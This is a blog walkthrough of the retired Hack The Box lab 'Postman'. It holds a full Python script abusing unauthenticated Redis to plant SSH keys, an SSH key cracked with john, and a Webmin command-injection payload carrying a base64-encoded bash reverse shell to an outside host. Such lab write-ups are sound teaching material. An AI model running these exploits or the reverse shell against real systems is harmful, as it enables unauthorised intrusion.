Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Postman
| Name: | Postman 
|
|---|---|
| Release Date: | 02 Nov 2019 |
| Retire Date: | 14 Mar 2020 |
| OS: | Linux  |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
sampriti  00 days, 02 hours, 45 mins, 58 seconds |
 |
anymuz  00 days, 02 hours, 55 mins, 04 seconds |
| Creator: | TheCyberGeek  |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160
$ nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 14:05 EDT
Nmap scan report for 10.10.10.160
Host is up (0.025s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.42 seconds
We start with SSH, HTTP, Redis, and MiniServ
earchsploit Redis
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit) | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) | linux/remote/47195.rb
Redis 5.0 - Denial of Service | linux/dos/44908.txt
Redis-cli
By now, you all know my aversion to Metasploit, but now that I know what to look for, I'm sure I can find a method of exploit outside of MSF. We come across CVE-2018-12326. So, to start, let's go ahead and install redis on our kali box so we can have the redis-tools for later. To do that, we run
sudo apt-get install redis
From there, we should be able to use redis-cli to connect to the box with redis-cli -h 10.10.10.160. Once connected, we can try a CONFIG GET * just to see if we can actually execute anything unauthenticated. Not surprisingly, we can.
There's 178 or so entries in that command, but we only really needed to know that we could execute. Running CONFIG GET DIR shows us that we are operating in the /var/lib/redis directory. Avinash had a pre-built exploit written here, but let's examine what it is actually doing (or it's no better that using MSF).
#!/usr/bin/python
#Author : Avinash Kumar Thapa aka -Acid
#Twitter : https://twitter.com/m_avinash143
#################################################
import os
import os.path
from sys import argv
from termcolor import colored
script, ip_address, username = argv
PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'
def ssh_connection():
shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address
os.system(shell)
if os.path.isfile(PATH) or os.path.isfile(PATH1):
try:
print colored('\t*******************************************************************', "green")
print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green")
print colored('\t*******************************************************************', "green")
print "\n"
print colored("\t SSH Keys Need to be Generated", 'blue')
os.system('ssh-keygen -t rsa -C \"acid_creative\"')
print colored("\t Keys Generated Successfully", "blue")
os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt")
cmd = "redis-cli -h " + ip_address + ' flushall'
cmd1 = "redis-cli -h " + ip_address
os.system(cmd)
cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist'
os.system(cmd2)
cmd3 = cmd1 + ' config set dbfilename "backup.db" '
cmd4 = cmd1 + ' config set dir' + " /home/"+username+"/.ssh/"
cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
cmd6 = cmd1 + ' save'
os.system(cmd3)
os.system(cmd4)
os.system(cmd5)
os.system(cmd6)
print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
ssh_connection()
except:
print "Something went wrong"
else:
print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")
OK. It looks like this script is creating SSH keys and transferring them via redis-cli to the target. We could do that manually, but as I've said, hackers are lazy creatures. I'll re-use code/script as long as I understand what it is doing. That said, that script looks like it needs a valid username on the box, which we don't have. However, checking keys * in redis-cli and using GET cracklist, I can see the key that was created. Perhaps I can force the connection via key.
Now before I go celebrating, this shell/user cannot do ANYTHING hardly. Round 2. Jump to /tmp grab LinEnum.sh and run it thoroughly to see what jumps out. And it does! /opt/id_rsa.bak owned by "Matt". Let's see if we can view it.
So, it's encrypted. Simple SSH2JOHN command.
sudo /usr/share/john/ssh2john.py key.enc > clearkey.enc
sudo john --wordlist=/usr/share/wordlists/rockyou.txt clearkey.enc
It looks like Matt has a password of computer2008. Move from redis to Matt and grab the user flag. There's not a lot more we can do in CLI right now, so let's jump over to port 10000 and it's MiniServ WebMin page. Logging in with Matt:computer2008, we can grab the Webmin version (1.910) and see what's there. I eventually come across this Proof of Concept on GitHub and try it out, crafting my payload using:
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"' | base64
u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMC80NDQ0IDA+JjEi|base64${IFS}-d|bash)
nc -lvnp 9999
Let's send it off and see if it works. I did have to change the + signs to %2b's, but after that Boom! We have a winner and a root shell.
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.